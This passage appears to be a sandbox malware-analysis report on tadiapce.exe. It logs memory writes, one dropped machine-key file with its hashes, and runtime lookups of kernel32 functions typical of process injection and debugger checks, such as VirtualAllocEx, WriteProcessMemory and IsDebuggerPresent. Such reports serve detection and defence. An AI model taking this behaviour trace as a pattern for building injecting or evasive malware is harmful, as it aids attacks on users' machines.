Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 19	4	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055108, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005510c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055110, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055114, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055118, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005511c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055120, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055124, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055128, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005512c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 24	3	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055130, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 23	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055134, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 16	5	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055138, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005513c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055140, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055144, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055148, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 9	7	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005514c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055150, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055154, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055158, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005515c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055160, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055164, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055168, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005516c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055170, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055174, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 6	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055178, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005517c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055180, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055184, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055188, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005518c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 25	2	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055190, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 28	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055194, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055198, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005519c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551a0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551a4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551a8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551ac, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551b4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551b8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551bc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551c0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551c4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551c8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551cc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551d0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551d4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551d8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551dc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551e0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551e4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551e8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551ec, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551f0, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551f4, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551f8, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 11	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100551fc, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 29	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055200, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055204, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055208, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005520c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055210, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055214, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055218, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005521c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055220, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055224, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055228, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005522c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055230, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055234, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 38	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055238, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005523c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055240, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055244, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 8	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055248, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005524c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055250, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055254, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055258, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005525c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055260, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055264, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055268, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x20000, size = 7	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x1005526c, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055270, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055274, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x10055278, size = 4	1	Fn Data
Modify Memory	#24: c:\users\2xc7u663gxwc\appdata\roaming\chromedata\tadiapce.exe	0x264	address = 0x100552cc, size = 4	1	Fn Data

Dropped Files

Filename	File Size	Hash Values	YARA Match	Actions
c:\programdata\microsoft\crypto\rsa\machinekeys\d71375b114e472f50fdecc6000e0f0a4_3912d7c0-2df4-4798-9de9-c60c58f001d5	45 bytes	MD5: 1717f95fa1ffb4cab7e7771b2ddeb37b SHA1: b4a7a2f9bc64044e604950eb34fbadc7e20464f7 SHA256: 1e3af54334dde428a43ca068306d7400ccd35d81de9b688c151fccb7a77c49d0 SSDeep: 3:/lwltfRl:Wbl		... File Actions Show Properties Download

Threads

Thread 0x418

1973

Category	Operation	Information	Count	Logfile
Module	Load	module_name = KERNEL32.dll, base_address = 0x76b10000	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceFrequency, address_out = 0x76b522a7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetCurrentDirectoryA, address_out = 0x76b5903d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentDirectoryA, address_out = 0x76b4733c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetTickCount, address_out = 0x76b5ba60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTime, address_out = 0x76b5ced8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpiA, address_out = 0x76b52249	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetLastError, address_out = 0x76b5bf00	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushInstructionCache, address_out = 0x76b523c6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeLibrary, address_out = 0x76b5d9d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadProcessMemory, address_out = 0x76b4c1ce	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAllocEx, address_out = 0x76b4c1b6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcAddress, address_out = 0x76b633d3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x76b4be77	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetVersionExA, address_out = 0x76b63861	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryA, address_out = 0x76b6395c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleA, address_out = 0x76b5cf41	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ResumeThread, address_out = 0x76b50f1c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualAlloc, address_out = 0x76b62fb6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualFree, address_out = 0x76b61da4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetLastError, address_out = 0x76b5bb08	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteProcessMemory, address_out = 0x76b4c1de	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapReAlloc, address_out = 0x7739ff51	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ExitProcess, address_out = 0x76b6214f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileW, address_out = 0x76b5cc56	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DecodePointer, address_out = 0x7738cd10	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointerEx, address_out = 0x76b4f5b2	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleMode, address_out = 0x76b62412	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetConsoleCP, address_out = 0x76b62c8a	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FlushFileBuffers, address_out = 0x76b47f81	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetStdHandle, address_out = 0x76b9f589	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FreeEnvironmentStringsW, address_out = 0x76b61dc3	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetEnvironmentStringsW, address_out = 0x76b61dbc	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineW, address_out = 0x76b6679e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCommandLineA, address_out = 0x76b698ff	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateThread, address_out = 0x76b6375d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CloseHandle, address_out = 0x76b5ca7c	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetExitCodeThread, address_out = 0x76b46ddd	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrcmpA, address_out = 0x76b48c59	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = lstrlenA, address_out = 0x76b5a611	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77389ac5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSection, address_out = 0x7738a149	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77377760	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EnterCriticalSection, address_out = 0x773777a0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetProcessHeap, address_out = 0x76b61280	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapAlloc, address_out = 0x77382dd6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapSize, address_out = 0x77389bec	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapValidate, address_out = 0x76b525dd	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = HeapFree, address_out = 0x76b5bbd0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Sleep, address_out = 0x76b5ba46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCPInfo, address_out = 0x76b61e2e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetOEMCP, address_out = 0x76b53db9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsValidCodePage, address_out = 0x76b6c1c0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileExA, address_out = 0x76b9f3ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindClose, address_out = 0x76b60e62	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = UnhandledExceptionFilter, address_out = 0x76b6ed38	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetUnhandledExceptionFilter, address_out = 0x76b63d01	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcess, address_out = 0x76b5cdcf	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateProcess, address_out = 0x76b52331	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x76b676b5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsDebuggerPresent, address_out = 0x76b53ea8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStartupInfoW, address_out = 0x76b63891	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleW, address_out = 0x76b6374d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = QueryPerformanceCounter, address_out = 0x76b5bb9f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentProcessId, address_out = 0x76b5cac4	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetCurrentThreadId, address_out = 0x76b5bb80	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetSystemTimeAsFileTime, address_out = 0x76b62fde	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeSListHead, address_out = 0x77395eeb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadFile, address_out = 0x76b596fb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileSizeEx, address_out = 0x76b559ef	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualQuery, address_out = 0x76b676d6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindFirstFileA, address_out = 0x76b62d89	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = FindNextFileA, address_out = 0x76b5a187	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x76b5cee8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = DeleteFileA, address_out = 0x76b547cb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x76b5cecb	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32First, address_out = 0x76b7443d	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = OpenProcess, address_out = 0x76b559d7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x76b4f731	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ProcessIdToSessionId, address_out = 0x76b5b744	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalAlloc, address_out = 0x76b59ce1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = Process32Next, address_out = 0x76b74505	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GlobalFree, address_out = 0x76b59cf9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x76b4480b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TerminateThread, address_out = 0x76b622a7	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateProcessA, address_out = 0x76b12082	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = IsWow64Process, address_out = 0x76b54785	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteFile, address_out = 0x76b61400	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetFilePointer, address_out = 0x76b5db36	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = SetEndOfFile, address_out = 0x76b52319	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = VirtualProtectEx, address_out = 0x76b9f5d9	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileSize, address_out = 0x76b50273	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = CreateNamedPipeA, address_out = 0x76b9d44f	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = EncodePointer, address_out = 0x7738a295	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RaiseException, address_out = 0x76b4eb60	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InterlockedFlushSList, address_out = 0x77383129	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = RtlUnwind, address_out = 0x76b47f70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = InitializeCriticalSectionAndSpinCount, address_out = 0x76b63939	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsAlloc, address_out = 0x76b635a1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsGetValue, address_out = 0x76b5da70	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsSetValue, address_out = 0x76b5da88	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = TlsFree, address_out = 0x76b613b8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LoadLibraryExW, address_out = 0x76b54775	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleHandleExW, address_out = 0x76b53e39	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetModuleFileNameA, address_out = 0x76b633f6	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = MultiByteToWideChar, address_out = 0x76b6452b	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WideCharToMultiByte, address_out = 0x76b6450e	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStdHandle, address_out = 0x76b61e46	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetFileType, address_out = 0x76b675a5	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = WriteConsoleW, address_out = 0x76b582f1	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetACP, address_out = 0x76b639aa	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = GetStringTypeW, address_out = 0x76b667c8	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = LCMapStringW, address_out = 0x76b613d0	1	Fn
Module	Get Address	module_name = c:\windows\system32\kernel32.dll, function = ReadConsoleW, address_out = 0x76b70e73	1	Fn
Module	Load	module_name = USER32.dll, base_address = 0x76c00000	1	Fn
Module	Get Address	module_name = c:\windows\system32\user32.dll, function = wsprintfA, address_out = 0x76c13f47	1	Fn
